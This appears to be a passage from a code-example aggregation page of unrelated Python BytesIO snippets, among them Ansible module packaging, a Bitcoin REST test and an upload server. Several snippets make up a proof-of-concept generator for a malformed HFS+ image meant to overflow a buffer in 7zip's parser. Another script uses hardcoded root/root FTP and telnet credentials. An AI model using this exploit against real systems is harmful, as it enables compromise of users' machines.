                except IOError:
                    raise AnsibleError('A different worker process failed to create module file. '
                                       'Look at traceback for that process for debugging information.')
        zipdata = to_text(zipdata, errors='surrogate_or_strict')

        shebang, interpreter = _get_shebang(u'/usr/bin/python', task_vars)
        if shebang is None:
            shebang = u'#!/usr/bin/python'

        # Enclose the parts of the interpreter in quotes because we're
        # substituting it into the template as a Python string
        interpreter_parts = interpreter.split(u' ')
        interpreter = u"'{0}'".format(u"', '".join(interpreter_parts))

        now = datetime.datetime.utcnow()
        output.write(to_bytes(ACTIVE_ANSIBALLZ_TEMPLATE % dict(
            zipdata=zipdata,
            ansible_module=module_name,
            params=python_repred_params,
            shebang=shebang,
            interpreter=interpreter,
            coding=ENCODING_STRING,
            year=now.year,
            month=now.month,
            day=now.day,
            hour=now.hour,
            minute=now.minute,
            second=now.second,
        )))
        b_module_data = output.getvalue()

    elif module_substyle == 'powershell':
        # Powershell/winrm don't actually make use of shebang so we can
        # safely set this here.  If we let the fallback code handle this
        # it can fail in the presence of the UTF8 BOM commonly added by
        # Windows text editors
        shebang = u'#!powershell'

        exec_manifest = dict(
            module_entry=to_text(base64.b64encode(b_module_data)),
            powershell_modules=dict(),
            module_args=module_args,
            actions=['exec'],
            environment=environment
        )

        exec_manifest['exec'] = to_text(base64.b64encode(to_bytes(leaf_exec)))

        if async_timeout > 0:
            exec_manifest["actions"].insert(0, 'async_watchdog')
            exec_manifest["async_watchdog"] = to_text(base64.b64encode(to_bytes(async_watchdog)))
            exec_manifest["actions"].insert(0, 'async_wrapper')
            exec_manifest["async_wrapper"] = to_text(base64.b64encode(to_bytes(async_wrapper)))
            exec_manifest["async_jid"] = str(random.randint(0, 999999999999))
            exec_manifest["async_timeout_sec"] = async_timeout

        if become and become_method == 'runas':
            exec_manifest["actions"].insert(0, 'become')
            exec_manifest["become_user"] = become_user
            exec_manifest["become_password"] = become_password
            exec_manifest["become"] = to_text(base64.b64encode(to_bytes(become_wrapper)))

        lines = b_module_data.split(b'\n')
        module_names = set()

        requires_module_list = re.compile(to_bytes(r'(?i)^#\s*requires\s+\-module(?:s?)\s*(Ansible\.ModuleUtils\..+)'))

        for line in lines:
            # legacy, equivalent to #Requires -Modules powershell
            if REPLACER_WINDOWS in line:
                module_names.add(b'Ansible.ModuleUtils.Legacy')
            line_match = requires_module_list.match(line)
            if line_match:
                module_names.add(line_match.group(1))

        for m in set(module_names):
            m = to_text(m)
            mu_path = ps_module_utils_loader.find_plugin(m, ".psm1")
            if not mu_path:
                raise AnsibleError('Could not find imported module support code for \'%s\'.' % m)
            exec_manifest["powershell_modules"][m] = to_text(
                base64.b64encode(
                    to_bytes(
                        _slurp(mu_path)
                    )
                )
            )

        # FUTURE: smuggle this back as a dict instead of serializing here; the connection plugin may need to modify it
        module_json = json.dumps(exec_manifest)

        b_module_data = exec_wrapper.replace(b"$json_raw = ''", b"$json_raw = @'\r\n%s\r\n'@" % to_bytes(module_json))

    elif module_substyle == 'jsonargs':
        module_args_json = to_bytes(json.dumps(module_args))

        # these strings could be included in a third-party module but
        # officially they were included in the 'basic' snippet for new-style
        # python modules (which has been replaced with something else in
        # ansiballz) If we remove them from jsonargs-style module replacer
        # then we can remove them everywhere.
        python_repred_args = to_bytes(repr(module_args_json))
        b_module_data = b_module_data.replace(REPLACER_VERSION, to_bytes(repr(__version__)))
        b_module_data = b_module_data.replace(REPLACER_COMPLEX, python_repred_args)
        b_module_data = b_module_data.replace(REPLACER_SELINUX, to_bytes(','.join(C.DEFAULT_SELINUX_SPECIAL_FS)))

        # The main event -- substitute the JSON args string into the module
        b_module_data = b_module_data.replace(REPLACER_JSONARGS, module_args_json)

        facility = b'syslog.' + to_bytes(task_vars.get('ansible_syslog_facility', C.DEFAULT_SYSLOG_FACILITY), errors='surrogate_or_strict')
        b_module_data = b_module_data.replace(b'syslog.LOG_USER', facility)

    return (b_module_data, module_style, shebang)
Exemple #46
0
 def encode(self, fields, files):
     body = BytesIO()
     for chunk, _ in self.iter(fields, files):
         body.write(chunk)
     return self.content_type, body.getvalue()
Exemple #47
0
def dumpRaw(d):
    s = BytesIO()
    s.write(d)
    s.seek(0)
    return s.read()
Exemple #48
0
    def run_test(self):
        url = urllib.parse.urlparse(self.nodes[0].url)
        self.log.info("Mining blocks...")

        self.nodes[0].generate(1)
        self.sync_all()
        self.nodes[2].generate(100)
        self.sync_all()

        assert_equal(self.nodes[0].getbalance(), 250)

        txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
        self.sync_all()
        self.nodes[2].generate(1)
        self.sync_all()
        bb_hash = self.nodes[0].getbestblockhash()

        assert_equal(self.nodes[1].getbalance(),
                     Decimal("0.1"))  #balance now should be 0.1 on node 1

        # load the latest 0.1 tx over the REST API
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + txid + self.FORMAT_SEPARATOR + "json")
        json_obj = json.loads(json_string)
        vintx = json_obj['vin'][0][
            'txid']  # get the vin to later check for utxo (should be spent by then)
        # get n of 0.1 outpoint
        n = 0
        for vout in json_obj['vout']:
            if vout['value'] == 0.1:
                n = vout['n']

        #######################################
        # GETUTXOS: query an unspent outpoint #
        #######################################
        json_request = '/checkmempool/' + txid + '-' + str(n)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)

        #check chainTip response
        assert_equal(json_obj['chaintipHash'], bb_hash)

        #make sure there is one utxo
        assert_equal(len(json_obj['utxos']), 1)
        assert_equal(json_obj['utxos'][0]['value'], 0.1)

        #################################################
        # GETUTXOS: now query an already spent outpoint #
        #################################################
        json_request = '/checkmempool/' + vintx + '-0'
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)

        #check chainTip response
        assert_equal(json_obj['chaintipHash'], bb_hash)

        #make sure there is no utox in the response because this oupoint has been spent
        assert_equal(len(json_obj['utxos']), 0)

        #check bitmap
        assert_equal(json_obj['bitmap'], "0")

        ##################################################
        # GETUTXOS: now check both with the same request #
        ##################################################
        json_request = '/checkmempool/' + txid + '-' + str(
            n) + '/' + vintx + '-0'
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(len(json_obj['utxos']), 1)
        assert_equal(json_obj['bitmap'], "10")

        #test binary response
        bb_hash = self.nodes[0].getbestblockhash()

        binaryRequest = b'\x01\x02'
        binaryRequest += hex_str_to_bytes(txid)
        binaryRequest += pack("i", n)
        binaryRequest += hex_str_to_bytes(vintx)
        binaryRequest += pack("i", 0)

        bin_response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + self.FORMAT_SEPARATOR + 'bin', binaryRequest)
        output = BytesIO()
        output.write(bin_response)
        output.seek(0)
        chainHeight = unpack("i", output.read(4))[0]
        hashFromBinResponse = hex(deser_uint256(output))[2:].zfill(64)

        assert_equal(
            bb_hash, hashFromBinResponse
        )  #check if getutxo's chaintip during calculation was fine
        assert_equal(chainHeight, 102)  #chain height must be 102

        ############################
        # GETUTXOS: mempool checks #
        ############################

        # do a tx and don't sync
        txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + txid + self.FORMAT_SEPARATOR + "json")
        json_obj = json.loads(json_string)
        vintx = json_obj['vin'][0][
            'txid']  # get the vin to later check for utxo (should be spent by then)
        # get n of 0.1 outpoint
        n = 0
        for vout in json_obj['vout']:
            if vout['value'] == 0.1:
                n = vout['n']

        json_request = '/' + txid + '-' + str(n)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(
            len(json_obj['utxos']), 0
        )  #there should be an outpoint because it has just added to the mempool

        json_request = '/checkmempool/' + txid + '-' + str(n)
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(
            len(json_obj['utxos']), 1
        )  #there should be an outpoint because it has just added to the mempool

        #do some invalid requests
        json_request = '{"checkmempool'
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + self.FORMAT_SEPARATOR + 'json', json_request,
            True)
        assert_equal(
            response.status,
            500)  #must be a 500 because we send a invalid json request

        json_request = '{"checkmempool'
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + self.FORMAT_SEPARATOR + 'bin', json_request,
            True)
        assert_equal(response.status,
                     500)  #must be a 500 because we send a invalid bin request

        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos/checkmempool' + self.FORMAT_SEPARATOR + 'bin', '',
            True)
        assert_equal(response.status,
                     500)  #must be a 500 because we send a invalid bin request

        #test limits
        json_request = '/checkmempool/'
        for x in range(0, 20):
            json_request += txid + '-' + str(n) + '/'
        json_request = json_request.rstrip("/")
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json',
            '', True)
        assert_equal(response.status,
                     500)  #must be a 500 because we exceeding the limits

        json_request = '/checkmempool/'
        for x in range(0, 15):
            json_request += txid + '-' + str(n) + '/'
        json_request = json_request.rstrip("/")
        response = http_post_call(
            url.hostname, url.port,
            '/rest/getutxos' + json_request + self.FORMAT_SEPARATOR + 'json',
            '', True)
        assert_equal(response.status,
                     200)  #must be a 500 because we exceeding the limits

        self.nodes[0].generate(1)  #generate block to not affect upcoming tests
        self.sync_all()

        ################
        # /rest/block/ #
        ################

        # check binary format
        response = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + bb_hash + self.FORMAT_SEPARATOR + "bin", True)
        assert_equal(response.status, 200)
        assert_greater_than(int(response.getheader('content-length')), 80)
        response_str = response.read()

        # compare with block header
        response_header = http_get_call(
            url.hostname, url.port,
            '/rest/headers/1/' + bb_hash + self.FORMAT_SEPARATOR + "bin", True)
        assert_equal(response_header.status, 200)
        assert_equal(int(response_header.getheader('content-length')), 80)
        response_header_str = response_header.read()
        assert_equal(response_str[0:80], response_header_str)

        # check block hex format
        response_hex = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + bb_hash + self.FORMAT_SEPARATOR + "hex", True)
        assert_equal(response_hex.status, 200)
        assert_greater_than(int(response_hex.getheader('content-length')), 160)
        response_hex_str = response_hex.read()
        assert_equal(
            encode(response_str, "hex_codec")[0:160], response_hex_str[0:160])

        # compare with hex block header
        response_header_hex = http_get_call(
            url.hostname, url.port,
            '/rest/headers/1/' + bb_hash + self.FORMAT_SEPARATOR + "hex", True)
        assert_equal(response_header_hex.status, 200)
        assert_greater_than(
            int(response_header_hex.getheader('content-length')), 160)
        response_header_hex_str = response_header_hex.read()
        assert_equal(response_hex_str[0:160], response_header_hex_str[0:160])
        assert_equal(
            encode(response_header_str, "hex_codec")[0:160],
            response_header_hex_str[0:160])

        # check json format
        block_json_string = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + bb_hash + self.FORMAT_SEPARATOR + 'json')
        block_json_obj = json.loads(block_json_string)
        assert_equal(block_json_obj['hash'], bb_hash)

        # compare with json block header
        response_header_json = http_get_call(
            url.hostname, url.port,
            '/rest/headers/1/' + bb_hash + self.FORMAT_SEPARATOR + "json",
            True)
        assert_equal(response_header_json.status, 200)
        response_header_json_str = response_header_json.read().decode('utf-8')
        json_obj = json.loads(response_header_json_str, parse_float=Decimal)
        assert_equal(len(json_obj),
                     1)  #ensure that there is one header in the json response
        assert_equal(json_obj[0]['hash'],
                     bb_hash)  #request/response hash should be the same

        #compare with normal RPC block response
        rpc_block_json = self.nodes[0].getblock(bb_hash)
        assert_equal(json_obj[0]['hash'], rpc_block_json['hash'])
        assert_equal(json_obj[0]['confirmations'],
                     rpc_block_json['confirmations'])
        assert_equal(json_obj[0]['height'], rpc_block_json['height'])
        assert_equal(json_obj[0]['version'], rpc_block_json['version'])
        assert_equal(json_obj[0]['merkleroot'], rpc_block_json['merkleroot'])
        assert_equal(json_obj[0]['time'], rpc_block_json['time'])
        assert_equal(json_obj[0]['nonce'], rpc_block_json['nonce'])
        assert_equal(json_obj[0]['bits'], rpc_block_json['bits'])
        assert_equal(json_obj[0]['difficulty'], rpc_block_json['difficulty'])
        assert_equal(json_obj[0]['chainwork'], rpc_block_json['chainwork'])
        assert_equal(json_obj[0]['previousblockhash'],
                     rpc_block_json['previousblockhash'])

        #see if we can get 5 headers in one response
        self.nodes[1].generate(5)
        self.sync_all()
        response_header_json = http_get_call(
            url.hostname, url.port,
            '/rest/headers/5/' + bb_hash + self.FORMAT_SEPARATOR + "json",
            True)
        assert_equal(response_header_json.status, 200)
        response_header_json_str = response_header_json.read().decode('utf-8')
        json_obj = json.loads(response_header_json_str)
        assert_equal(len(json_obj), 5)  #now we should have 5 header objects

        # do tx test
        tx_hash = block_json_obj['tx'][0]['txid']
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + tx_hash + self.FORMAT_SEPARATOR + "json")
        json_obj = json.loads(json_string)
        assert_equal(json_obj['txid'], tx_hash)

        # check hex format response
        hex_string = http_get_call(
            url.hostname, url.port,
            '/rest/tx/' + tx_hash + self.FORMAT_SEPARATOR + "hex", True)
        assert_equal(hex_string.status, 200)
        assert_greater_than(int(response.getheader('content-length')), 10)

        # check block tx details
        # let's make 3 tx and mine them on node 1
        txs = []
        txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),
                                               11))
        txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),
                                               11))
        txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),
                                               11))
        self.sync_all()

        # check that there are exactly 3 transactions in the TX memory pool before generating the block
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/mempool/info' + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        assert_equal(json_obj['size'], 3)
        # the size of the memory pool should be greater than 3x ~100 bytes
        assert_greater_than(json_obj['bytes'], 300)

        # check that there are our submitted transactions in the TX memory pool
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/mempool/contents' + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        for tx in txs:
            assert_equal(tx in json_obj, True)

        # now mine the transactions
        newblockhash = self.nodes[1].generate(1)
        self.sync_all()

        #check if the 3 tx show up in the new block
        json_string = http_get_call(
            url.hostname, url.port,
            '/rest/block/' + newblockhash[0] + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        for tx in json_obj['tx']:
            if not 'coinbase' in tx['vin'][0]:  #exclude coinbase
                assert_equal(tx['txid'] in txs, True)

        #check the same but without tx details
        json_string = http_get_call(
            url.hostname, url.port, '/rest/block/notxdetails/' +
            newblockhash[0] + self.FORMAT_SEPARATOR + 'json')
        json_obj = json.loads(json_string)
        for tx in txs:
            assert_equal(tx in json_obj['tx'], True)

        #test rest bestblock
        bb_hash = self.nodes[0].getbestblockhash()

        json_string = http_get_call(url.hostname, url.port,
                                    '/rest/chaininfo.json')
        json_obj = json.loads(json_string)
        assert_equal(json_obj['bestblockhash'], bb_hash)
Exemple #49
0
class FileAvoidWrite(object):
    """File-like object that buffers output and only writes if content changed.

    Use this class like when writing to a file to avoid touching the original
    file if the content hasn't changed. This is useful in scenarios where file
    mtime is used to invalidate caches or trigger new behavior.

    When writing to this file handle, all writes are buffered until the object
    is closed.

    Objects can be used as context managers.
    """
    def __init__(self, path):
        # type: (unicode) -> None
        self._path = path
        self._io = None  # type: Union[StringIO, BytesIO]

    def write(self, data):
        # type: (Union[str, bytes]) -> None
        if not self._io:
            if isinstance(data, text_type):
                self._io = StringIO()
            else:
                self._io = BytesIO()

        self._io.write(data)

    def close(self):
        # type: () -> None
        """Stop accepting writes and write file, if needed."""
        if not self._io:
            raise Exception('FileAvoidWrite does not support empty files.')

        buf = self.getvalue()
        self._io.close()

        r_mode = 'r'
        w_mode = 'w'
        if isinstance(self._io, BytesIO):
            r_mode = 'rb'
            w_mode = 'wb'

        old_content = None

        try:
            with open(self._path, r_mode) as old_f:
                old_content = old_f.read()
                if old_content == buf:
                    return
        except IOError:
            pass

        with open(self._path, w_mode) as f:
            f.write(buf)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.close()

    def __getattr__(self, name):
        # Proxy to _io instance.
        if not self._io:
            raise Exception('Must write to FileAvoidWrite before other '
                            'methods can be used')

        return getattr(self._io, name)
Exemple #50
0
    def write(self) -> bytes:
        b = BytesIO()
        b.write(Int(self.ID, False))

        # No flags

        b.write(Int(self.id))

        b.write(Long(self.access_hash))

        b.write(Int(self.date))

        b.write(Int(self.admin_id))

        b.write(Int(self.participant_id))

        b.write(Bytes(self.g_a_or_b))

        b.write(Long(self.key_fingerprint))

        return b.getvalue()
Exemple #51
0
    def add(self, name, itemData = None, last = False):
        #constants
        kHeadSize = 14
        kRecordHeaderSize = 16
        kAttrRecordType_Inline = 0x10

        #Space & add new node
        self.__hr.totalNodes += 1
        
        #Create Node
        node = BytesIO()
        node.write("\x00" * FileAttributes.NODE_SIZE)
        node.seek(0)

        #NODE #1    
        desc = BTNodeDescriptor()
        desc.numRecords = 1
        desc.kind = 0xFF #nodeType_leaf
        if last:
            desc.fLink = 0        
        else:
            desc.fLink = self.__hr.totalNodes
        node.write(desc)

        nodeDataOffset = sizeof(desc)    

        #data
        data = AttrHeaderData()
        keyString  = name   
        data.fileID = 0x31337 if itemData else 0xdeadbeef
        data.startBlock = 0
        data.nameLen = len(keyString)
        data.keyLen = kHeadSize - 2 + data.nameLen * 2
        node.write(data)

        #name string
        node.write( unicode(keyString).encode("utf-16be") )

        record = AttrHeaderRecord()
        record.recordType = kAttrRecordType_Inline
        record.dataSize = 16
        node.write(record)
        
        #itemData
        if itemData:
            node.write(itemData)

        #offsets   
        offsets = struct.pack(">H",nodeDataOffset+kHeadSize + kRecordHeaderSize + data.keyLen + record.dataSize) #offsetNext because 7zip calculates record size based on difference between values of record offsets we need to put at least 2 offsets
        offsets += struct.pack(">H",nodeDataOffset) #offset
        node.seek(FileAttributes.NODE_SIZE - len(offsets))
        node.write(offsets)
        
        #add to rest of attributes
        node.seek(0)
        self.__content.write( node.read() )
Exemple #52
0
    def process(self):
        if (self.path == '/MACandLIP'):
            decode_json = self.LoadJson()
            self.mac_ip_dict[decode_json['MAC']] = decode_json['LIP']

            jdict = {'status': 'ok'}
            self.WriteJson(jdict)

        elif (self.path == '/MAC'):
            decode_json = self.LoadJson()
            mac = decode_json['MAC']

            jdict = {'MAC': '', 'LIP': ''}
            jdict['MAC'] = mac

            if mac in self.mac_ip_dict:
                jdict['LIP'] = self.mac_ip_dict[mac]

            self.WriteJson(jdict)
        elif (self.path == '/Image'):

            image = self.deal_formdata()

            jdict = {"category": "shape", "color": "0", "shape": "xxx"}
            jdict['shape'] = getShape(np.asarray(image))
            #jdict = {"category":"letter","color":"xxx","letter","xxx"}
            #jdict = {"category":"number","color":"xxx","number","xxx"}
            #jdict = {"category":"fail"}
            self.WriteJson(jdict)
        else:
            r, info = self.deal_post_data()
            print((r, info, "by: ", self.client_address))
            f = BytesIO()
            f.write(b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
            f.write(b"<html>\n<title>Upload Result Page</title>\n")
            f.write(b"<body>\n<h2>Upload Result Page</h2>\n")
            f.write(b"<hr>\n")
            if r:
                f.write(b"<strong>Success:</strong>")
            else:
                f.write(b"<strong>Failed:</strong>")
            f.write(info.encode())
            f.write(("<br><a href=\"%s\">back</a>" %
                     self.headers['referer']).encode())
            f.write(b"<hr><small>Powerd By: bones7456, check new version at ")
            f.write(
                b"<a href=\"http://li2z.cn/?s=SimpleHTTPServerWithUpload\">")
            f.write(b"here</a>.</small></body>\n</html>\n")
            length = f.tell()
            f.seek(0)
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.send_header("Content-Length", str(length))
            self.end_headers()
            if f:
                self.copyfile(f, self.wfile)
                f.close()
"""Friedrich Schotte, May 1, 2015 - May 7, 2015"""
from ftplib import FTP
from telnetlib import Telnet
from io import BytesIO
from struct import pack

data = ""
for i in range(0,10*1000/2):
    data += pack(">bbHIII",0x03,0x000,0x0001,0xF0FFB044,0x00000001,0x00000000)
    data += pack(">bbHIII",0x03,0x000,0x0001,0xF0FFB044,0x00000001,0x00000001)

f = BytesIO()
f.write(data)
f.seek(0)

ftp = FTP("pico25.niddk.nih.gov","root","root")
ftp.storbinary ("STOR /tmp/sequence.bin",f) 
ftp.close()

telnet = Telnet("pico25.niddk.nih.gov")
telnet.read_until("login: "******"root\n")
telnet.read_until("Password: "******"root\n")
telnet.read_until("# ")
telnet.write("/bin/cat < /tmp/sequence.bin > /dev/sequencer &\n")
telnet.read_until("# ")
telnet.write("exit\n")
transcript = telnet.read_all()
telnet.close()
Exemple #54
0
def generateExploit():
 #region header
    fw = file(r'PoC.hfs','wb')
    hfs = BytesIO()
    OVERFLOW_VALUE = 0x10040
    #set header
    header = HFSPlusVolumeHeader()
    memset(addressof(header),0,sizeof(header))
    #Setting up header
    memmove(header.Header,"H+",2)
    header.Version = 4
    header.fileCount = 1
    header.folderCount = 0
    header.blockSize = 1024
    header.totalBlocks = 0x11223344 #updated later
    header.freeBlocks  = 0x0
    
    blockSizeLog = HFS.blockSizeToLog(header.blockSize)    
    
    forkDataOffset = 1
    if header.blockSize <= 0x400:
       forkDataOffset = ( 0x400 / header.blockSize ) + 1
#endregion

#region attribute
    kMethod_Attr     = 3; #// data stored in attribute file
    kMethod_Resource = 4; #// data stored in resource fork

    #attributesFile offset        
    attributesOffset = forkDataOffset 
    print("attributesOffset : ",attributesOffset)
    attributes = FileAttributes()

    #SPRAY
    #for i in range(0,50):        
    #   attributes.add("X"*( (0x20 / 2)-1 ) )

    decmpfsHeader =  DecmpfsHeader()
    decmpfsHeader.magic = struct.unpack("I", struct.pack(">I",0x636D7066) )[0] #magic == "fpmc"
    decmpfsHeader.compressionType = struct.unpack("I", struct.pack(">I",kMethod_Resource) )[0]
    decmpfsHeader.fileSize = struct.unpack("Q", struct.pack(">Q",0x10000) )[0] 
    attributes.add("com.apple.decmpfs",decmpfsHeader,True)
    attributesData = attributes.getContent()
    attributesDataLen = len(attributesData)

    #ForkData attributesFile
    totalBlocks = attributesDataLen / header.blockSize
    totalBlocks += 1 if ( attributesDataLen % header.blockSize ) else 0
    header.attributesFile.totalBlocks = totalBlocks
    header.attributesFile.logicalSize = header.attributesFile.totalBlocks * header.blockSize
    header.attributesFile.extents[0].startBlock = forkDataOffset
    header.attributesFile.extents[0].blockCount = header.attributesFile.totalBlocks

    #increase fork offset
    forkDataOffset += header.attributesFile.totalBlocks

#endregion

#region catalog

    catalogOffset = forkDataOffset
    print("catalogOffset : ", catalogOffset)
    kHeadSize = 14
    kBasicRecSize = 0x58
    kAttrRecordType_Inline = 0x10

    NODE_SIZE = 512
    catalog = BytesIO()
    catalog.write("\x00" * NODE_SIZE)
    catalog.seek(0)

    desc = BTNodeDescriptor() # any, 7zip does not parse it
    memset(addressof(desc),0x42,sizeof(desc))
    catalog.write(desc)

    hr   = BTHeaderRec()
    hr.firstLeafNode = 1
    hr.nodeSize = NODE_SIZE # sizeLog
    hr.totalNodes = 2        
    catalog.write(hr)

    #align
    catalog.seek( NODE_SIZE )

    #Create Node
    catalogNode = BytesIO()
    catalogNode.write( "\x00" * NODE_SIZE )
    catalogNode.seek(0)
    desc = BTNodeDescriptor()    
    desc.numRecords = 1
    desc.kind = 0xFF #nodeType_leaf
    desc.fLink = 0
    catalogNode.write(desc)
    
    data = CatalogHeaderData()
    keyString = "icewall"
    data.nameLen = len(keyString)
    data.parentID = 0x11223344
    data.keyLen = data.nameLen * 2 + 6
    catalogNode.write(data)
    catalogNode.write( unicode(keyString).encode("utf-16be") )    

    RECORD_TYPE_FILE = 2 
    item = CatalogFile()
    item.recordType = RECORD_TYPE_FILE
    item.fileID = 0x31337
    #data fork
    item.dataFork.logicalSize = 0
    item.dataFork.totalBlocks = 0
    item.dataFork.extents[0].startBlock = 0
    item.dataFork.extents[0].blockCount = 0

    totalBlocks = OVERFLOW_VALUE / header.blockSize
    totalBlocks += 1 if ( OVERFLOW_VALUE % header.blockSize ) else 0
    print ("resource fork total blocks : 0x%x" % totalBlocks)
    #resource fork    
    item.resourceFork.totalBlocks = totalBlocks
    item.resourceFork.logicalSize = item.resourceFork.totalBlocks * header.blockSize
    item.resourceFork.extents[0].startBlock = catalogOffset + 1# just after catalog
    item.resourceFork.extents[0].blockCount = totalBlocks
    catalogNode.write(item)

    #offsets   
    nodeDataOffset = sizeof(desc)    
    offsets = struct.pack(">H",nodeDataOffset + kBasicRecSize + 22 + 0x50 * 2) #offsetNext because 7zip calculates record size based on difference between values of record offsets we need to put at least 2 offsets
    offsets += struct.pack(">H",nodeDataOffset) #offset
    catalogNode.seek(hr.nodeSize - len(offsets))
    catalogNode.write(offsets)    
    catalogNode.seek(0)
    catalog.write(  catalogNode.read() )
    catalog.seek( 0 )
    catalogData = catalog.read()

    header.catalogFile.totalBlocks = 1 #FIXED!!! remember
    header.catalogFile.logicalSize = header.catalogFile.totalBlocks * header.blockSize
    header.catalogFile.extents[0].startBlock = forkDataOffset
    header.catalogFile.extents[0].blockCount = header.catalogFile.totalBlocks

    forkDataOffset += header.catalogFile.totalBlocks

#endregion

#region resource

    #resource fork data    
    resourceOffset = forkDataOffset
    print("resource : ",resourceOffset)
    kHeaderSize = 0x100
    resourceFork = BytesIO()
    resourceFork.write("\x00" * kHeaderSize)
    resourceFork.seek(0)

    numBlocks = 2
    dataSize2 = OVERFLOW_VALUE + 0x20 #value used to overflow
    mapSize  = 50 
    mapPos   = item.resourceFork.logicalSize - mapSize
    dataSize = dataSize2 + 4
    dataPos  = mapPos - dataSize       
    print("mapSize : 0x%x\nmapPos : 0x%x\ndataSize : 0x%x\ndataPos : 0x%x\nitem.resourceFork.logicalSize : 0x%x" % (mapSize,mapPos,dataSize,dataPos,item.resourceFork.logicalSize) )
    resourceFork.write( struct.pack(">I",dataPos) ) # dataPos
    resourceFork.write( struct.pack(">I", mapPos) )# mapPos
    resourceFork.write( struct.pack(">I",dataSize) ) # dataSize
    resourceFork.write( struct.pack(">I",mapSize) ) # mapSize    
    #offset + 256    
    resourceFork.seek(kHeaderSize) 
    resourceFork.write(struct.pack(">I",dataSize2) )
    resourceFork.write(struct.pack("<I",numBlocks) )
    #table
    size1 = OVERFLOW_VALUE 
    offset1 = (numBlocks << 3) + 4
    offset2 = size1 + offset1
    size2 =  dataSize2 - offset2
    resourceFork.write(struct.pack("<I",offset1) )
    resourceFork.write(struct.pack("<I",size1) )
    resourceFork.write(struct.pack("<I",offset2) )
    resourceFork.write(struct.pack("<I",size2) )
    resourceFork.write("\x0F") # just to quickly end function
    resourceFork.write("A"*(size1-1)) #payload
    resourceFork.write("B"*0x20000) #additional data
    resourceFork.seek(0)
    resourceData = resourceFork.read()

#endregion

    #Write 7zip header
    header.totalBlocks = header.attributesFile.totalBlocks + header.catalogFile.totalBlocks + item.resourceFork.totalBlocks     
    hfs.write("\x00" * (header.blockSize * header.totalBlocks) ) # just to make space for everything
    hfs.seek(0x400) # 7zip requires that space
    hfs.write(header)

    hfs.seek(attributesOffset * header.blockSize)
    hfs.write(attributesData)

    hfs.seek(catalogOffset * header.blockSize)
    hfs.write(catalogData)

    hfs.seek(resourceOffset * header.blockSize)
    hfs.write(resourceData)
    
    hfs.seek(0)

    fw.write(hfs.read())
    fw.close()
Exemple #55
0
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 08:51:35 2017
@author: shuai.qian
"""
from io import StringIO, BytesIO

f = StringIO()
f.write('hello')
f.write(' world!')
print(f.getvalue())

sio = StringIO('Hello!\nHi!\nGoodbye!')
while True:
    s = sio.readline()
    if s == '':
        break
    print(s.strip())
bio = BytesIO()
bio.write('中文'.encode('utf-8'))
print(bio.getvalue())
print(bio.read())
Exemple #56
0
class FileAttributes(object):    

    NODE_SIZE = 512

    def __init__(self):
        self.__offset = 0
        self.__content = BytesIO()
        #aligment
        self.__content.write("\x00"*FileAttributes.NODE_SIZE)
        self.__content.seek(0)
        ####
        desc = BTNodeDescriptor() # any, 7zip does not parse it
        memset(addressof(desc),0x41,sizeof(desc))   
        self.__content.write(desc)
        ###
        self.__hr   = BTHeaderRec()
        self.__hr.firstLeafNode = 1
        self.__hr.nodeSize = FileAttributes.NODE_SIZE # sizeLog    
        self.__hr.totalNodes = 1 
        self.__content.write(self.__hr)
        
        #align to node size
        self.__content.seek(FileAttributes.NODE_SIZE)

    def add(self, name, itemData = None, last = False):
        #constants
        kHeadSize = 14
        kRecordHeaderSize = 16
        kAttrRecordType_Inline = 0x10

        #Space & add new node
        self.__hr.totalNodes += 1
        
        #Create Node
        node = BytesIO()
        node.write("\x00" * FileAttributes.NODE_SIZE)
        node.seek(0)

        #NODE #1    
        desc = BTNodeDescriptor()
        desc.numRecords = 1
        desc.kind = 0xFF #nodeType_leaf
        if last:
            desc.fLink = 0        
        else:
            desc.fLink = self.__hr.totalNodes
        node.write(desc)

        nodeDataOffset = sizeof(desc)    

        #data
        data = AttrHeaderData()
        keyString  = name   
        data.fileID = 0x31337 if itemData else 0xdeadbeef
        data.startBlock = 0
        data.nameLen = len(keyString)
        data.keyLen = kHeadSize - 2 + data.nameLen * 2
        node.write(data)

        #name string
        node.write( unicode(keyString).encode("utf-16be") )

        record = AttrHeaderRecord()
        record.recordType = kAttrRecordType_Inline
        record.dataSize = 16
        node.write(record)
        
        #itemData
